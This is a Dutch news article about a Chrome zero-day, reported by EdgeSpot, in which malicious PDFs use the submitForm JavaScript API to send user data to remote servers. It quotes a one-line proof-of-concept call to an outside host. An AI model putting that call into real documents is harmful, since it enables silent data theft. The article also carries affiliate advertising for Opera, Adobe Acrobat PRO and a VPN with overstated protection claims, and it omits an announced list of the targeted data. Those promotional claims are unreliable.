browsers

Met de Chrome-bug kunnen hackers gebruikersgegevens verzamelen via pdf-bestanden

Met de Chrome-bug kunnen hackers gebruikersgegevens verzamelen via pdf-bestanden

Exploitdetectieservice EdgeSpot ontdekte een intrigerende zero-day-kwetsbaarheid in Chrome door gebruik te maken van PDF-documenten.

Door het beveiligingslek kunnen aanvallers gevoelige gegevens verzamelen met behulp van kwaadaardige pdf-documenten die in Chrome zijn geopend. 

Zodra het slachtoffer de respectieve pdf-bestanden in Google Chrome opent, begint een kwaadaardig programma op de achtergrond te werken door gebruikersgegevens te verzamelen.

De gegevens worden vervolgens doorgestuurd naar de externe server die wordt beheerd door de hackers. U vraagt ​​zich misschien af ​​welke gegevens door de aanvallers worden opgezogen, ze richten zich op de volgende gegevens op uw pc:

Pas op voor door malware geteisterde PDF-bestanden

Experts hebben dat een van de twee domeinen opgemerkt readnotify [.] com of burpcollaborator [.] net ontving de gegevens.

Ze onthulden dat de aanvallers de this.submitForm () PDF Javascript API om de gevoelige informatie van de gebruikers te verzamelen.

We hebben het getest met een minimale PoC, een simpele API-aanroep zoals this.submitForm ('http://google.com/test') zorgt ervoor dat Google Chrome de persoonlijke gegevens naar google.com verzendt.

Deze Chrome-bug werd misbruikt door twee verschillende sets kwaadaardige pdf-bestanden, die beide respectievelijk in oktober 2017 en september 2018 circuleerden.

Met name de verzamelde gegevens kunnen door de aanvallers worden gebruikt om aanvallen in de toekomst te verfijnen. Rapporten suggereren dat de eerste batch bestanden is gecompileerd met behulp van de PDF-trackingservice van ReadNotify.

Gebruikers kunnen de service gebruiken om gebruikersweergaven bij te houden. EdgeSpot heeft geen details gedeeld over de aard van de tweede set pdf-bestanden.

Snelle tip: verander uw browser in Opera

In deze moeilijke tijden worden we bij elke stap aangevallen met malware, phishing en Trojaanse paarden, dus we moeten veel waakzamer zijn en beschermd blijven.

En aangezien dit een specifiek probleem is voor Chrome, kunt u die dreiging en alle andere vermijden met een op beveiliging gerichte browser zoals Opera.

Deze browser wordt geleverd met een ingebouwde advertentieblokkering die niet alleen dergelijke afleidingen opruimt, maar ook analysescripts, trackingpixels en methoden om uw gegevens te verzamelen blokkeert. 

En als je er absoluut zeker van wilt zijn dat je uit de buurt blijft van elk gevaar, ga dan achter de ingebouwde VPN-service staan ​​die 100% gratis te gebruiken is voor onbeperkte tijd.

Opera

Opera biedt de perfecte bescherming tegen bedreigingen met de ingebouwde adblocker en gratis VPN-service! Krijg het gratis Bezoek website

Hoe kan ik beschermd blijven tegen PDF-kwetsbaarheden?

Download Adobe Acrobat PRO

Adobe en Chrome passen goed bij het omgaan met pdf-bestanden. Door de Adobe-extensie voor Chrome te installeren, kunt u PDF's naar wens bekijken en bewerken zonder uw favoriete browser te verlaten.

Ondanks de robuuste structuur wordt malware die in pdf-bestanden is verborgen, mogelijk niet gedetecteerd als u de standaardversie van de Reader gebruikt.

De professionele versie wordt aanbevolen om uw bescherming te garanderen en uw gegevens weg te houden van hackers.

Hoewel het niet gratis is, is de prijs die u betaalt vrij laag vanwege de overvloed aan extra functies waarvan u zult genieten, waaronder de verbeterde beveiliging van uw PDF-bestanden..

Er is ook een gratis proefperiode van 7 dagen inbegrepen, zodat u kunt proeven van de volledige Pro-ervaring voordat u de aankoop doet.

Adobe Acrobat PRO

Blijf uit de buurt van malware door Adobe Acrobat PRO te downloaden. Het heeft veel meer functies dan de gratis versie en houdt uw gegevens veilig. Gratis proefperiode Bezoek website Lees meer

Als u tijdens het surfen op internet veilig wilt zijn, heeft u een volledig speciale tool nodig om uw netwerk te beveiligen.  Installeer nu Private Internet Access en beveilig jezelf. Het beschermt uw pc tegen aanvallen tijdens het browsen, maskeert uw IP-adres en blokkeert alle ongewenste toegang.

De Exploit-detectiedienst EdgeSpot wilde de Chrome-gebruikers informeren over de mogelijke risico's, omdat de patch naar verwachting niet in de nabije toekomst zou worden uitgebracht.

EdgeSpot rapporteerde vorig jaar aan Google over de kwetsbaarheid en het bedrijf beloofde eind april een patch uit te brengen.

U kunt echter overwegen om een ​​tijdelijke oplossing voor het probleem te gebruiken door de ontvangen PDF-documenten lokaal te bekijken met een andere reader-app.

Als alternatief kunt u uw pdf-documenten ook in Chrome openen door uw systemen los te koppelen van internet.

Veelgestelde vragen: meer informatie over Chrome-extensies

Ja dat doet het. Maar als u een bredere selectie wilt, bekijk dan onze topkeuzes voor Chrome-privacy-extensies in deze complete gids.

Er zijn veel extensies waarmee pdf's kunnen worden verwerkt. Bekijk onze uitstekende gids over de beste pdf-extensies voor Chrome.

Het doet het niet, maar u kunt het snel activeren. Hier is onze uitgebreide gids over het inschakelen van de QR-codegenerator in Chrome.

Opmerking van de uitgever: Dit bericht is oorspronkelijk gepubliceerd in april 2020 en is sindsdien vernieuwd en bijgewerkt in augustus 2020 voor versheid, nauwkeurigheid en volledigheid.

ramen KB3179574 voor Windows 8.1 veroorzaakt problemen met het langzaam opstarten
KB3179574 voor Windows 8.1 veroorzaakt problemen met het langzaam opstarten
Microsoft heeft onlangs de uitrol van de update van augustus voor Windows 8.1 gepusht, waardoor een overvloed aan systeemverbeteringen aan het besturi...
ramen Herstellen Geen wifi, mobiele gegevensverbinding in Windows 10 Mobile Jubileumupdate
Herstellen Geen wifi, mobiele gegevensverbinding in Windows 10 Mobile Jubileumupdate
De Windows 10 Mobile-jubileumupdate is er, maar deze is niet vrij van fouten. Terwijl gebruikers het nieuwe besturingssysteem testen, komen ze verschi...
ramen Waarschuwing Fake Adobe Flash Update installeert malware op uw Windows-computer
Waarschuwing Fake Adobe Flash Update installeert malware op uw Windows-computer
Als u een onverwacht bericht ontvangt waarin u wordt gevraagd uw Adobe Flash Player bij te werken, denk dan twee keer na voordat u op de updateknop dr...